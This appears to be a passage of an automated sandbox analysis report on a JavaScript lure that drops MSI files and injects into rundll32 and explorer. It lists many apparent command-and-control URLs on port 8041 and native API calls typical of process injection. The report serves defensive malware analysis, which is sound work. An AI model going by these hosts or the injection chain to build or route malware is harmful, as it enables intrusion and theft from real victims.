                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036648885.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.php9#
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.phpF
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.phpO#
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/azar.php
                  Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.php8
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpi
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpll
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpll.mui
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.php~
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/f
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/in.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/net.com:8041/admin.phpf
                  Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/net.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/zar.php
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/g;
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/I
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php-7
                  Source: rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpGN
                  Source: rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpUN
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpi
                  Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpl.mui
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpp
                  Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php3?8
                  Source: rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpAm=
                  Source: rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpGN
                  Source: rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpq#(
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/net.com:8041/Pw
                  Source: explorer.exe, 00000008.00000002.3351439546.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/
                  Source: explorer.exe, 00000008.00000002.3352293048.000000000C642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/ECOMPARE.EXE.15Desktop
                  Source: explorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/eE
                  Source: explorer.exe, 00000008.00000002.3346806877.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352293048.000000000C642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352293048.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/
                  Source: explorer.exe, 00000008.00000002.3346806877.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/3
                  Source: explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/G
                  Source: explorer.exe, 00000008.00000002.3352293048.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/M
                  Source: explorer.exe, 00000008.00000002.3346806877.00000000099B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/i
                  Source: explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/l
                  Source: explorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/yEz
                  Source: explorer.exe, 00000008.00000002.3350911655.000000000B7DD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://opewolumeras.com/test/
                  Source: explorer.exe, 00000008.00000002.3350911655.000000000B7DD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://opewolumeras.com/test/P
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 00000008.00000000.2456761349.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com/
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com/)
                  Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA37000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/
                  Source: rundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/$E
                  Source: rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/%
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/&
                  Source: rundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/0E
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/8~
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/F
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/L
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/N
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/Q
                  Source: rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/Y
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php.
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php=
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpM
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.3031010424.000001FF4CA63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/oQ
                  Source: explorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                  Source: explorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
                  Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drString found in binary or memory: https://www.advancedinstaller.com
                  Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drString found in binary or memory: https://www.thawte.com/cps0/
                  Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50048 version: TLS 1.2
                  Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_4797e325-3
                  Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_2984fdd2-5
                  Source: Yara matchFile source: 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR

                  System Summary

                  barindex
                  Sample has a suspicious name (potential lure to open the executable)
                  Source: Document-18-33-08.jsStatic file information: Suspicious name
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Microsoft Windows Installer HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C1090-0000-0000-C000-000000000046}Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000001FF4C9CDACE NtReadFile,6_3_000001FF4C9CDACE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000001FF4C9CD9FE NtOpenFile,6_3_000001FF4C9CD9FE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000001FF4C9CDA6E NtProtectVirtualMemory,6_3_000001FF4C9CDA6E
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000001FF4C9CD98E NtAllocateVirtualMemory,6_3_000001FF4C9CD98E
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE7A50 NtSetContextThread,6_2_000001FF4CAE7A50
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAEF3A0 CreateToolhelp32Snapshot,Thread32First,NtSuspendThread,NtResumeThread,Thread32Next,NtClose,6_2_000001FF4CAEF3A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD17B0 NtClose,6_2_000001FF4CAD17B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB04FF0 NtQueueApcThread,6_2_000001FF4CB04FF0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB04BE0 NtProtectVirtualMemory,6_2_000001FF4CB04BE0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB03F40 NtAllocateVirtualMemory,6_2_000001FF4CB03F40
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB04740 NtFreeVirtualMemory,6_2_000001FF4CB04740
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB04360 NtCreateThreadEx,6_2_000001FF4CB04360
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE55C0 NtClose,NtTerminateThread,6_2_000001FF4CAE55C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB051C0 NtReadVirtualMemory,6_2_000001FF4CB051C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD71B0 NtClose,6_2_000001FF4CAD71B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD1600 NtClose,RtlExitUserThread,6_2_000001FF4CAD1600
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB045F0 NtDuplicateObject,6_2_000001FF4CB045F0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE8149 NtSetContextThread,6_2_000001FF4CAE8149
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305C704 NtDelayExecution,8_2_0305C704
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305B388 NtAllocateVirtualMemory,8_2_0305B388
                  Source: C:\Windows\explorer.exeCode function: 8_2_030582B4 NtFreeVirtualMemory,8_2_030582B4
                  Source: C:\Windows\explorer.exeCode function: 8_2_030601A0 NtFreeVirtualMemory,8_2_030601A0
                  Source: C:\Windows\explorer.exeCode function: 8_2_030581C8 NtWriteFile,8_2_030581C8
                  Source: C:\Windows\explorer.exeCode function: 8_2_03058240 NtClose,8_2_03058240
                  Source: C:\Windows\explorer.exeCode function: 8_2_030580B8 RtlInitUnicodeString,NtCreateFile,8_2_030580B8
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7623.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF101.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF160.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1BF.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1DF.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF22E.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF29D.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIF101.tmpJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FB6A504_2_00FB6A50
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FEF0324_2_00FEF032
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FDC2CA4_2_00FDC2CA
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FE92A94_2_00FE92A9
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FDE2704_2_00FDE270
